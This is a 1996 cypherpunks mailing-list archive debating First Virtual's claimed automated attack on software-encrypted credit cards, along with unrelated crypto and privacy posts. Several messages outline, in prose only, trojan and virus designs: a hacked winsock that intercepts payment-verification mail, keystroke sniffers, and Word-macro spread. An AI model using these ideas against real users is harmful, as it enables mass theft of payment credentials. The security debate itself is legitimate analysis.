> to periodically send its results to the attacker, it could download
> an updated list of FV pages at the same time.  

Seems to me your "not much harder" claim is starting to break down here,
with an automated virus spreading itself all over the net and
downloading lists from altavista weekly.  And the amount of net traffic
you're generating may make this attack a lot more quickly detected than
ours.  (In fact, I imagine that if the folks at AltaVista or Lycos noted
thousands of identical searches focused on merchants accepting First
Virtual, they'd probably contact us, more out of concern for their own
load management than anything else.)  But still, read on -- we're
finally coming to the good part.

> Attacking the e-mail verification step of the FV system could also
> be accomplished via a hacked winsock.  A bit of POP3 aware code
> in the winsock could intercept the verification messages and keep
> the e-mail client from ever seeing them.  It could automatically
> generate "Yes" responses for all such messages.

OK, so you're only interested in POP3 mail tools?  That's wonderful, but
there's also systems that use IMAP, systems that use raw SMTP to locally
resident message stores, and many odder things.  There's also people who
get their mail through AOL, Compuserve, Prodigy, etc.  There's people
who live on a PC or Mac, but who read mail on a UNIX system (e.g. many
Delphi and Netcom users).  

You're not going to catch all of them.  Moreover, even if you say
"that's fine, we only need some of them", your attack is now dead in the
water.  Why?  Because you have no way of telling, in your attack virus,
what kind of technology is going to be used to read mail.  This means
that your attack will inevitably, and quickly, hit some people who DO
receive the mail.  Our fraud department will be quickly notified (when
the user answers "fraud" to our query, a human sees it right away) and
we'll be off to the races, collecting clues.  It will be work tracking
it down, but we'll have a good shot in identifying the attack and
producing a program that helps users spot it on their system (the moral
equivalent of an anti-viral program) in less time than it would take you
to even suspect that the attack FV outlined had taken place in the world
of software-encrypted credit cards.

Your attack would be caught by us relatively quickly because our model
is based not on a single fail-safe piece of security software, but on
*process* security.  The overall process is multifaceted, with many
checks and balances.  What if, for example, I go to someone else's
machine and use their web browser to buy something using MY First
Virtual ID?  Your attack will capture my ID and allow you to try to use
it, but the email confirmation will go elsewhere, quite possibly to an
uninfected machine.  When reproduced on a mass scale, this kind of thing
will be noticed pretty fast.  In contrast, credit cards are a one-way
payment mechanism -- the number (and sometimes some other info typed in
close proximity) is basically all you need.  Just steal that without
getting noticed and the crime is done.

>   I believe that FV is just as vulnerable to these types of
> attacks as any of the encryption based credit card schemes, if
> not more so.  The thing that really protects FV is that it can
> only be used to buy bit, not real goods, and the bad guys don't
> generally care about stealing bits.  This is also what makes FV
> not generally useful to people who want to shop over the internet.

Actually, you're a bit behind the times.  We removed that restriction
from our system a couple of months ago.  There still aren't many people
using our system for physical goods, mostly because of our 91-day fund
holding period, but we have gotten the green light from our financial
partners to waive that for qualified, established merchants, once we
make a few technical changes behind the scenes.

The fact is that our original restriction against physical goods was
never designed to protect against fraud.  Rather, it was a conscious
attempt to do two things:  1) bound the risk our bank perceived in being
the first bank ever to explicitly agree to handle an Internet-based
payment system (this was mid-1994, remember), and 2) to focus the
attention of our prospective users on the situations that were in fact
reasonably well-suited to an economic model in which consumers had the
explicit option of refusing payment.  Some of our sellers very quickly
realized that no matter what we said, it was straightforward to use our
system for physical goods, shipping them only after the consumer said
"yes", and we eventually changed our terms and conditions to reflect
that reality.  The 91 day hold, on the other hand, WAS designed to
protect against fraud -- from the *merchant* side, which is why we have
no qualms about waiving it for qualified merchants.

Now, actually, I want to commend you.  This is as close as I've ever
seen anyone come to constructing a plausible automated attack on FV. 
The IP stack is a very clever attack vector, and I honestly can't claim
to have anticipated it.  However, I do think that the flaw in your
approach reinforces my belief in the importance of multi-layered
defenses.  In fact, a multi-layered security strategy is the ONLY
defense against vulnerabilities you haven't thought of yet.  That's the
real reason why ANY scheme based on one-way instruments like credit card
numbers is particularly hard to make secure.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joe_n_turner@amoco.com
Date: Thu, 1 Feb 1996 09:34:26 +0800
To: PADGETT@hobbes.orl.mmc.com
Subject: re: More FUD
In-Reply-To: <960131174331.202083b0@hobbes.orl.mmc.com>
Message-ID: <199602010014.AA04925@interlock.amoco.com>
MIME-Version: 1.0
Content-Type: text/plain


Author:  owner-cypherpunks at unix,sh/dd.RFC-822=owner-cypherpunks\@toad\.com
Date:    1/31/96  4:43 PM

Your comments intrigued me, but unfortunately I have to disagree with you on 
several points.
    
>>The degree to which the attack you describe is a threat to online 
>>commerce depends critically on the degree to which viruses and Trojan 
>>horse programs can propagate through their potential base of platforms. 
     
>Have to interject a comment: even real professionals (which virus writers 
>are not) have trouble getting software to work on on machine, let alone 
>all of the different platforms out there. Windows is worse (ever try to 
>write a .VXD - not easy). Take Michelangelo (please) is a member of a 
>class of viruses the is very difficult to detect: you have to read one 
>word at 0:414 from DOS to know something is wrong.

"real professionals?"  You mean the kind that take meetings to avoid work and 
leave the office by 5:00?  As far as "virus writers" there are relatively few 
that I would lump into that category, but the ones who do get there are worthy 
of at least a little respect.  Most are of the 
VCL-cut-and-paste-upload-it-and-see-who-complains variety.

I have never written a virtual device driver for windows, but I have written 
kernel device drivers for Windows NT, and some nifty driver and TSR code for 
MS-DOS.  I have (and still do) collect viruses.  Its been fun, and it also makes
me a teeny-tiny bit more employable.  
     
>True, in early '92 when [Mich] came out things were more difficult - not 
>everyone had 640k in their machine so the user acurally had to have a clue 
>how much memory was supposed to be there. Today is there anyone with 512k ?

If my memory serves me correctly, by '92 386's were rolling off the assembly 
lines.  Getting extended memory cards was still easy but they were getting more 
and more scarce as expanded memory became the rage.  A lot people did have 640k.

>Detection has *always* been easy, it is removal that is difficult and 
>*automated* removal that is even more so - know what it takes to determine 
>that there is a macro that might be a virus in a WORD document ? One bit. 
>(Of course things are made a bit more difficult by the fact that MicroSoft 
>considers that bit's location or even its *existance* to be "proprietary" 
>and requires an NDA before they will discuss it - I refuse to sign it).

Maybe you should use WordPerfect instead.  

>In recent months I have had all sorts of software blow up in Windows. 
>On this machine alone (a 486DX-100 w 8 Mb of RAM & Win 3.1, 1 Mb SVGA
>and nothing special), Reachout 5.0, FTP Onnet 2.0, QEMM 8.0 (Windows Manager), 
>and several name brand programs  have required massage to get to play 
>together - and these are the programs from people I consider expert at what 
>they do, in fact each is IMNSHO the best in their class.

Solution: Get rid of Windows.  Upgrade to '95, NT, or go to Linux, even OS/2. 

>And you tell me that someone is going to spread a virus on the net that will 
>capture keystrokes on any machine it hits without anyone noticing ? It is 
>to laugh (and if they can, they are wasting their time with credit card 
>numbers).

        This sounds like a challange.  Is it worth a T-Shirt?

[...snip...]

>Not going to say you could not make one machine act that way - that is easy, 
>not even going to say you won't make a number of machines act that way, but 
>spread with a virus enough will self-destruct on enough machines that 
>intelligent people will get suspicious and some will react creatively.
     
Not if it is written properly.  A lot of viruses become known only when they 
drop their payload.  Others are just poorly written, no different from a bad 
software product.

>Fact is that the greatest protection the net has is that no two machines are 
>alike, may even start that way but after six months, no way.

Ahhhhh.. but your wrong.  Granted, the underlying strata may be radically 
different, but I can run an MS-DOS program on an 300 Mhz DEC Alpha (under NT) 
without any problems (except I couldn't get DOOM to run).  There is already a 
read-only Filesystem driver for Linux that will read NT.  Like TCP/IP, the 
operating systems are going towards interoperability.

The big computer companies recognize that they have to compete to survive.  No 
longer can IBM design a machine and lock in their customers to IBM parts, IBM 
service, and an IBM operating system.
     
>                                                Warmly,
>                                                        Padgett

     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 2 Feb 1996 12:45:36 +0800
To: jwz@netscape.com>
Subject: C'mon, How Hard is it to Write a Virus or Trojan Horse? (was Re: Apology and clarification)
In-Reply-To: <cl3ShvGMc50eEWY1pL@nsb.fv.com>
Message-ID: <Ul3zkdqMc50e1T2TkB@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 30-Jan-96 Re: Apology and clarification
Jamie Zawinski@netscape. (4170*)

> Nathaniel Borenstein wrote:
> > 
> > What we at FV have done is to demonstrate how easy it is to develop an
> > FULLY AUTOMATED attack that undermines the security of all
> > software-based credit card commerce schemes.

> You have done no such thing.  You have written *one component* of that
> attack, and the easiest part of it at that.

> Combine it with a virus, or self-replicating worm, and demonstrate that
> it is immune to all known virus checkers, and *then* you will have
> spoken the truth when you say you have "demonstrated" anything.

This is a particularly fascinating reaction, Jamie.  As I see it, we
have implemented every part of the attack that we can implement without
doing anything that is either unethical or illegal.  Is it your position
that no systematic flaw in your security is real until someone has
actually broken it?  

Actually, that position would in fact be quite consistent with your
company's earlier implicit assertion that 40-bit encryption was
sufficient (for international consumers) until somebody actually broke
it, even though everyone who understood cryptography already knew
otherwise.

> You may think this is nitpicking, but the fact is, you're assuming that
> the implicit cooperation of some vast number of users in running your
> program is easy to obtain.  I disagree with this assumption.  If this
> assumption were true, then viruses would be a much bigger problem than
> the mere annoyance that they are today.

Nearly everyone with a computer has either been infected with a virus or
knows somebody who has.

There has never been a serious financial incentive for virus writers in
the past, so they haven't ever been, for example, bankrolled by
organized crime.  They've been written by sociopathic hobbyists in the
past.  Your commerce mechanism gives them an incentive to turn pro.

The average sophistication of Internet users is dropping every day, as
the net continues to explode, and the ease of spreading malicious
software is going up accordingly.

Having said all that, I do agree with you 100% that the hardest part of
the devastating, automated attack that we have outlined is in fact the
infection vector.  You are absolutely right about that.  What we have
shown is that the HARDEST part of stealing an unbounded number of credit
cards transmitted using your company's preferred commerce mechanism is,
in fact, the deployment of a virus or Trojan Horse.  Unfortunately, as
most personal computer users have long since realized, that just isn't
that uncommon or hard to do.

> *Computers* provide a path to large-scale fraud.  So does the printing
> press.  So does the telephone, and the postal system.  So what.  You
> still haven't proven that it's easy.

I suspect that the world's financial institutions will, by and large, be
grateful that First Virtual doesn't share your belief that one has to
wait for a criminal to break a system to be convinced that it is
insecure. 

Show me an automated way to break the postal system in a large-scale way
without getting caught, and then I'll be worried about it, too.

> With as much work as you've put into this, someone could write a
> Microsoft Word document which when opened, would start dumping the
> contents of your hard disk into the mail.  

Ooh, good point.  We could probably use MS Word macros as the infection
vector for our program.  I like that idea.  I'll add it to our list of
potential ways this program could spread itself.

However, the entire contents of your hard disk aren't of direct economic
value.  They're also hard to digest, and they're big enough to be likely
to be noticed in transit (e.g. they can easily fill up mail spools if
you mail 'em out).  I'd much rather sift through your hard disk looking
for credit card numbers, and then spirit them quietly off your machine. 
But I'd also install a keystroke sniffer if I suspected the user might
be using your preferred mechanism to send out his credit card number.

> It's not a matter of possibility.  It's a matter of probability, and
> risk management.  It's unlikely enough that I'm not afraid of using my
> credit card on the net.  Tell me my credit card number, and I'll change
> my mind.

Hey, you're a smart guy.  That probably means your machine is relatively
hard to infect.  A criminal would skip you and instead target the
millions of consumers who were more easily infected.  I didn't describe
a scheme that could target one individual's credit card.  I described a
scheme that could steal millions of them indiscriminately.

> All a banker needs to know is the amount of risk associated with the
> thing in which they are investing; they don't need to know how keyboard
sniffers work.

The "trust us, we're experts" approach to security is only as good as
the experts you trust, as you've just amply demonstrated.  For my part,
I'm happy to let the bankers hire independent experts study the attack
we've outlined and reach their own conclusions.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Thu, 1 Feb 1996 10:57:55 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: Denning's misleading statements
In-Reply-To: <kl2gs=G00YUvQWZIYI@andrew.cmu.edu>
Message-ID: <199602010234.SAA25877@well.com>
MIME-Version: 1.0
Content-Type: text


> Excerpts from internet.cypherpunks: 27-Jan-96 Re: Denning's misleading
> st.. by Mark Allyn 860-9454@ally 
> > I would like to make a suggestion that D. Denning; others
> > who are pro-escrow/clipper; and some of you folks here on
> > this forum get together for a debate. 
> >  
> > Ideally, this would be real nice on a TV show such as the
> > McNiel Lehrer show on PBS. Barring that, I would think 
> > that an IRC chat channel could be set up so that they
> > could get on line and engage in an on line discussion.
> 
> I doubt that they'd be interested, but if they are, Jon Lebkowsky of
> EFF-Austin hosts Electronic Frontiers, a HotWired online discussion
> forum, every Thursday night at 10 pm. The subject would fit in nicely
> with his discussions; this week he had Steve Jackson, of Steve Jackson
> Games.
> 
> I'm sure we could interest him in this.
> 
> -Declan

Definitely! I wonder who we could get from the FBI??

-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jon Lebkowsky <jonl@well.com>                 http://www.well.com/~jonl
Host, Electronic Frontiers Forum, 7PM PST 9PM CST Thursdays
  at Club Wired <http://www.hotwired.com/club>
Vice President, EFF-Austin <http://www.io.com/~efaustin>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 1 Feb 1996 09:13:35 +0800
To: sameer@c2.org>
Subject: Re: No FV supporters?
In-Reply-To: <199601310119.RAA29332@infinity.c2.org>
Message-ID: <Al3zxOeMc50eNT2K8w@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 30-Jan-96 Re: No FV supporters?
sameer@c2.org (711*)

> 	Would someone like to implement such a thing? That would be
> "the cypherpunk way" of properly debunking FV's claims.

As I just explained, I don't think it would be nearly as effective as
our attack.  But for the record, I must remind everyone on this list of
an important line that should not be crossed:

Our program *demonstrated* key parts of a comprehensive attack on
software-encrypted credit card numbers, but it most carefully did NOT
implement those parts of that attack which would facilitate the actual
theft and transport of those numbers.  If anyone can similarly design
and demonstrate a comprehensive attack on FV, that's their affair. 
However, if they don't follow our lead in acting responsibly, and
instead choose to unleash their software as a live attack, First Virtual
reserves the right to track them down to the best of its abilities and
prosecute them to the full extent of the law.

That's another important aspect of "process security" or multi-layer
security.   You take the legalities seriously.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Thu, 1 Feb 1996 09:33:57 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: Flaw in Netscape rejoinder (was Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards)
In-Reply-To: <gl3zCVKMc50e1T2Rsa@nsb.fv.com>
Message-ID: <Pine.A32.3.91.960131190807.120542D-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jan 1996, Nathaniel Borenstein wrote:

> choice of FV vs encryption is an either/or thing.  Combine FV's Virtual
> PIN mechanism with transport encryption and you've indiputably got
> something that's a LOT safer than just using credit cards with
> encryption, and a bit safer than our current system, too.  But I know,

Belt & Suspenders is Good (and you want the best and best tested of both.)
I may be being naive, but I think the contest profits all, so as brothers 
fight ye! ;-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@secapl.com>
Date: Thu, 1 Feb 1996 09:42:36 +0800
To: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: re: Netscape "secure E-Mail"
In-Reply-To: <960131175353.202083b0@hobbes.orl.mmc.com>
Message-ID: <Pine.A32.3.91.960131191659.120542E-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jan 1996, A. Padgett Peterson, P.E. Information Security wrote:

> Could do that now with a commerce server - didn't say "encrypted" email,
> said "secure". Prolly just sends it to port 443 on the secure channel and
> the server does the SMTP to the internal net.

  When I examine the headers from a PC running any POP client including
Netscape, (where the return path is smtp), they show up as originating
from the PC's address, whether direct net or dial-up PPP. Wouldn't that
indicate that the message is using SMTP not https over the link? (and
therefore in fact in the clear unless encrypted in body?) I think the
inclusion of the option of the Exchange client is a possible shift of the
onus of PEM to MS.  (frightening thought....)

 Where are MOSS and SMIME now? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Thu, 1 Feb 1996 10:17:32 +0800
To: mail2news@c2.org
Subject: gondolin.org services are back!
Message-ID: <199602010105.UAA01333@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

After a bout with InterNIC and multiple DNS problems, I am happy to announce
that the remailer/nymserver services located at gondolin.org are back 
on-line and functioning.

Type I/II Remailer:   mix@remail.gondolin.org
Nymserver:            alias@nym.gondolin.org

Keys are available via the correct commands and the keyservers.

Please contact me with any questions you may have.

Bryan

- -- 
Bryan Strawser, System/Network Administrator & Postmaster   feanor@gondolin.org
              Gondolin Technologies, Bloomington, Indiana USA



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRAR1fvQGgQ7UJMZAQHChwQAqdWdLsEN5++NwiR9dya6bBa6K4pISi5N
y/8QQSCqFC21Rz1pq9hpvCiuhCHbuLOga1XM/SeGBCIn54nVfu/HYZP4VaFxUxI2
Fy0DAAKQhMlXT3wSMZdQJkkBX+My76sJP5k4PDouA6R/B1BQiOWa60oVfRM3Dbo9
upi27fcc4PU=
=MDZQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 2 Feb 1996 02:10:48 +0800
To: mab@research.att.com
Subject: NOISE Re: Page one, NY Times, 29 January 1996
In-Reply-To: <199601292207.RAA25259@nsa.tempo.att.com>
Message-ID: <SwDEx8m9LoHZ085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601292207.RAA25259@nsa.tempo.att.com>,
Matt Blaze <mab@research.att.com> wrote:

> One of those microscopic bottom-of-page-one ads from John Young:
> "BOYCOTT ESPIONAGE-ENABLED SOFTWARE", with phone number and email
> address to contact for more information.

What?  No cutesy six-character code (BOY_cot) for the respondent's subject
line? ;-)

> 
> I'd be curious as to what the response has been like.

Me, too.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMRA8r+VevBgtmhnpAQHz3AL+NjA48B5ivbhWYwSCW34PnZR/e/GU9J4O
FdqHpktvBW9Gok0J48IRfRNDi2UKgo8JbGv7bkNsFxa/xocpbD8KVneXKMpk5leM
VjeqO2plAys9L6qoAzM7D4TfHr7Ade5O
=UuUU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 1 Feb 1996 10:16:17 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <199601310100.OAA00804@mycroft.actrix.gen.nz>
Message-ID: <HHiLiD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley <paul@mycroft.actrix.gen.nz> writes:
> > 4.  Imitate the IBM Christmas exec.  Break into someone's site and steal
> > their mail aliases file.  Now send mail to everyone on their alias list,
> > pretending to be them, offering them a cute animation program they can
> > install.  The animation will happen, but it will also send mail to all
> > THEIR aliases (like the Christmas exec) and (unlike that) install our
> > malicious snooping software.
>
> Another trojan horse.

I'd like to take an exception to this description of the XMAS EXEC, since
I too received a copy of it in '87 (but had the smarts not to run it).
It didn't break or steal anything. It did 2 things:

 * Displayed an ASCII Xmas tree;
 * E-mailed a copy of itself to every e-mail address listed in the database of
 e-mail aliases. VM/CMS comes a very convenient, standard, and user-friendly
 program for keeping track of nicknames, real names, and e-mail addresses,
 stored in a flat file with tags, which any REXX program can easily read.

I had serious doubts that the person who wrote it was malicious.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 1 Feb 1996 10:11:18 +0800
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: encrypted cellphones
In-Reply-To: <Pine.SOL.3.91.960131172957.4630D-100000@jaramillo.digit.ee>
Message-ID: <9602010113.AA07886@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


Juri Kaljudi wrote: 

> 
> On Wed, 31 Jan 1996, Bill Stewart wrote:
> 
> > providers don't.  The GSM phones used in much of the world have encryption,
> > but it's apparently not very strong.

	As the A5 algorithm has so far not been publically disclosed, no
one outside of the spook community really knows if has a backdoor or
what computational effort might be involved in brute forcing it.  One
can certainly suppose that there was a lot of pressure to weaken it,
but whether that was accomplished by installing trapdoors or simply by making
special purpose hardware brute forcers simple, fast, and cheap is not known.

> 
> I would say GSM security is still better than nothing. The problem is of 
> course that only tha radio link is encrypted, not the connection out into 
> public telephone network.

	I have seen news stories about some shady "spy-shop" type
companies in England who are selling microwave receivers capable
of intercepting and decoding the microwave backhaul links that connect
most GSM cell sites to the mobile switching offices.   Apparently even
some supposedly secure GSM systems use unencrypted backhauls which can
be relatively easily intercepted by someone with the right gear 
from places near enough the towers to have a line of sight view
of them.

						Dave Emery
						die@die.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 2 Feb 1996 13:53:42 +0800
To: cypherpunks@toad.com
Subject: Re: FV, Netscape and security as a product
In-Reply-To: <199601311753.JAA18008@darkwing.uoregon.edu>
Message-ID: <311043FF.186A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> Netscape and FV have both taken a
> "security is a product" stance, which is a gross misrepresentation.

  We are definitely moving away from the "security is a product" stance
that you mention.  It was definitely overdone in the early days of the
product, but after the security bugs of the summer I and others were
able to convince marketing that they should back off.  I want it to
be clear what our product can and can not do.  For example, SSL can
only protect data in transit between two machines.  If either machine
is compromised then the data can be stolen at that end.  Our product
does not attempt to secure the user's machine, and can not operate
securely on an insecure machine.  Expect to see warnings and disclaimers
of this nature from us in the future.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 1 Feb 1996 10:53:14 +0800
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <Pine.HPP.3.91.960131151408.14097B-100000@goshawk.csrv.uidaho.edu>
Message-ID: <a2JLiD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Syed Yusuf <yusuf921@uidaho.edu> writes:

> just another smear campain from the control-freak left, lets let this
> thread die please :)

While I fully agree that this thread deserves to die, in the interests
of accuracy I'd like to point out that the paper that libeled PZ is
a right-wing Tory rag.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Feb 1996 13:47:36 +0800
To: Peter Monta <cypherpunks@toad.com
Subject: Re: Crypto-smart-card startup Inside Technologies
Message-ID: <m0thqvv-00092XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 1/31/96 -0800, Peter Monta wrote:
>There's an article in the January 29 _EE Times_ about a French
>cryptographic-smart-card startup called Inside Technologies.
>Tidbits:
>
>  ..."In public-key cryptography, 512-bit keys are typical and
>  already vulnerable.  So we are looking at 640-bit-long keys
>  supported by a scalable design."


This kind of thing disgusts me.  We already know 512-bit keys are weak.  As
I recall, I was told that 512 bit keys could be cracked in 20,000
MIPS-years.  If the ballpark formula holds that adding 10 bits doubles the
security, that merely means that 640 bits is 2**(128/10) or 8000 times
strong.  While obviously better than 512, it is not ENOUGH better to make me
confident that this is a long-term secure length.  768 or 1024 bits should
be considered the minimum.  A deliberate design of 640 bits makes it look
like it's intended to be crackable in 5-10 years, much as DES was suspected
of a similar design decision in limiting its keylength to 56 bits.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 1 Feb 1996 14:35:39 +0800
To: cypherpunks@toad.com
Subject: FV has 91 day lag between sales and payment
Message-ID: <Pine.LNX.3.91.960131205343.9803A-100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain


FV seems to be the only Internet payment mechanism that lets buyers
quickly open an account and use their credit card to cover purchases. 
Anyone know of any others?  

The FV 90 day lag is their main downside in my opinion (though defaulting
to not paying if the customer does not answer email is another problem). 
So FV does not take any risk at all - and a merchant has to have enough
extra capital to let 3 months worth of sales sit at FV. Some ideas for
ways that they or someone else could improve on this: 

   1) reduce the 91 days after a merchant had been a merchant for awhile
   2) reduce the 91 days when sales were to long time customers
   3) verify customers with letters/phone calls when opening the
       account and then with digital signature on sales - and give very 
       short clearing time

    --  Vince

---------- Forwarded message ----------
Date: Wed, 31 Jan 1996 15:11:02 -0800
From: morehelp@fv.com
To: vince@offshore.com.ai
Subject: <960130/vinc0328078> (Lag between sales and payment?)

Your question has been answered by a help operator for FIRST VIRTUAL (TM).
The operator assigned to your question is op106 (Christopher Arndt), 

That operator, or someone consulted by that operator,
has provided the following answer to your question:
----------------
Hello,

We put an escrow hold on a seller's money for 91 days to 
protect ourselves from buyer credit card charge backs. We 
realize this can be inconvenient for some of our sellers, but at 
this time, that is how the system works.

Federal Regulation Z of the Credit Card Regulations entitles
credit card holders to a 90 period during which they can charge back 
any purchase. Though buyers are obligated to return the goods, 
this does not always happen.  The credit card company is obligated 
by federal law to pay the buyer back, and it is the merchant who 
is left without payment. In our system, because it is First 
Virtual that has the merchant credit card account, not you, First 
Virtual is at risk of losing money when your buyers issue charge 
backs on your sale items.

Because we do not conduct any credit checks on a seller, and because
any buyer can charge back any charge, if we didn't protect ourselves 
with this 91 day hold, we could easily fall victim to charge back fraud. 

But once 90 days have passed, it becomes significantly harder for a 
buyer 
to make a charge back. And it is at this point that we feel that the 
risk of a charge back is sufficiently low that we can deliver your funds to 
you.

We hold your money for 91 days for our protection, but the flip side is 
that we allow our sellers the freedom of being allowed to sell without
having to go through a credit check. Virtually anyone can sell using 
First Virtual, and this opens up many possibilities for people who 
otherwise would not be able to sell products through major 
credit cards over the Internet. 

Thank you for your interest in First Virtual

-- 
*************************************************************
            ...one flew east, one flew west,                               
            one flew over the cuckoo's nest...                                                                                                                             
 Christopher Arndt                 First Virtual Holdings          
 carndt@fv.com                     http://www.fv.com                  
*************************************************************




----------------
You may communicate further with our operator by replying to this message.

If you are unhappy with the service you get from operator op106,
you may send mail to "helpescalator@fv.com".

Your original question is included at the end of this message.

Thank you for using FIRST VIRTUAL!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 1 Feb 1996 05:51:08 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Netscape encrypted email!!
In-Reply-To: <Pine.LNX.3.91.960131154058.8700A-100000@offshore.com.ai>
Message-ID: <Pine.BSD.3.91.960131211123.20775C-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	aah, yes! now we can all have secure mail from the company 
    which opened its mouth and slipped about key escrow; you know
    them: the same company that sold million of backdoor units to
    NSA!  yeah, right...

		--attila


On Wed, 31 Jan 1996, Vincent Cate wrote:

> 
> >   * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
> >     email capabilities, allowing you to both read and send secure email
> >     messages without launching an external email application.
> 
> I downloaded it and checked it out.  But it was not clear how to use this
> secure email - so it may lack something yet in user friendlyness, or I may
> have just missed it.  Anyway, it should be much easier to use than PGP. 
> Are we all going to switch to Netscape for email?  Is anyone using this? 
> Want to tell us how? 
>  
>    --  Vince
> 
> 
>                      INTRODUCING NETSCAPE NAVIGATOR 2.0
> ----------------------------------------------------------------------------
> 
> END-USER FEATURES
> 
>    * Enhanced performance - New features such as client-side image mapping,
>      Progressive JPEG support, and support for multiple simultaneous
>      streaming of video, audio, and other data formats enhance the
>      performance of Netscape Navigator 2.0.
> 
>    * Integrated email - Netscape Navigator 2.0 offers full-featured and rich
>      email capabilities, allowing you to both read and send secure email
>      messages without launching an external email application.
> 
>    * Integrated newsgroups - Sort, read, and post newsgroup messages in
>      fully threaded hierarchical windows.
> 
>    * Security - New dynamic trust capability allows users to accept new
>      certificate authorities. Other features include improved security user
>      interface and protection against a site impersonating another site.
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 1 Feb 1996 14:07:59 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto-smart-card startup Inside Technologies
In-Reply-To: <m0thqvv-00092XC@pacifier.com>
Message-ID: <199602010541.VAA21657@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> >  [ Inside Technologies ]
